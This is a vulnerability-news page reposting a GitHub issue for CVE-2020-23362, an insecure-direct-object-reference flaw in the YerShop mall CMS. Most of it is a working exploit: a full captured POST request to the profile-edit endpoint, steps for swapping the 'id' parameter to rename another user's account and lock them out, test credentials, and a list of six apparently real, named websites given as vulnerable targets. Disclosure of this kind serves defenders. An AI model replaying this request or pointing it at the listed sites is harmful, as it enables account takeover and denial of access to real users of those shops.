Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2020-23362: Beyond authority loophole in Yershop · Issue #1 · huyiwill/shopcms_lang

Insecure Permissons vulnerability found in Shop_CMS YerShop all versions allows a remote attacker to escalate privileges via the cover_id parameter.

CVE
Open in Source
#vulnerability#web#windows#apple#js#java#php#auth#chrome#webkit

Yershop mall has a horizontal ultra vires vulnerability, which can be used to maliciously change any user name for the full version of the vulnerability, resulting in the user unable to log in the account.

The account passwords of the following cases are all below

Account 1: lu0r3n

Password: lu0r3n

Account 2: lu0r3n1

Password: lu0r3n

Case 1: http://39.105.34.27/projects/index.php/index/index/index.html

Landing place: http://39.105.34.27/projects/index.php/index/user/login.html

Personal data change office: http://39.105.34.27/projects/index.php/index/user/edit.html

Use burp to cut package when saving

Packet:

POST /projects/ index.php/index/user/edit .html HTTP/1.1

Host: 39.105.34.27

Content-Length: 66

Accept: application/json, text/javascript, /; q=0.01

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Origin: http://39.105.34.27

Referer: http://39.105.34.27/projects/index.php/index/user/edit.html

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: j1eU_ 2132_ saltkey=nj6wEe8s; j1eU_ 2132_ lastvisit=1588948355; j1eU_ 2132_ sid=UQR48r; PHPSESSID=174ae4d03e7fb8e838248372b01e3c3f; j1eU_ 2132_ lastact=1588952051%09 index.php%09

Connection: close

cover_ id=1&username=lu0r3n&sex=%E4%BF%9D%E5%AF%86&birthday=&id=382

Change id = 382 to id = 381 (because the ID of account 2 is 381, change the user name of account 2 here), change username = lu0r3n to hack, and then put the package

Come to the login place again, try to log in with the previous account password, but the user does not exist

Change lu0r3n1 to hack to log in and prove that the vulnerability exists

Case 2: http://www.sqdd.xyz/index.php/index/index/index.html

Landing place: http://www.sqdd.xyz/index.php/index/user/login.html

Personal information change: http://www.sqdd.xyz/index.php/index/user/edit.html

Case 3: http://www.cyawl.com/index.php/index/index/index.html

Landing place: http://www.cyawl.com/index.php/index/user/login.html

Personal information change: http://www.cyawl.com/index.php/index/member/edit.html

Case 4: http://www.dp378.cn/index.php/index/index/index.html

Landing place: http://www.dp378.cn/index.php/index/user/login.html

Personal information change: http://www.dp378.cn/index.php/index/member/edit.html

Case 5: https://demo.yershop.com/index.php/index/index/index.html

Landing place: https://demo.yershop.com/index.php/index/user/login.html

Personal information change: https://demo.yershop.com/index.php/index/user/edit.html

Case 6: http://www.girltoo.com/

Landing place: http://www.girltoo.com/index.php?s=/Home/User/login.html

Personal information change: http://www.girltoo.com/index.php?s=/Home/center/information.html

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE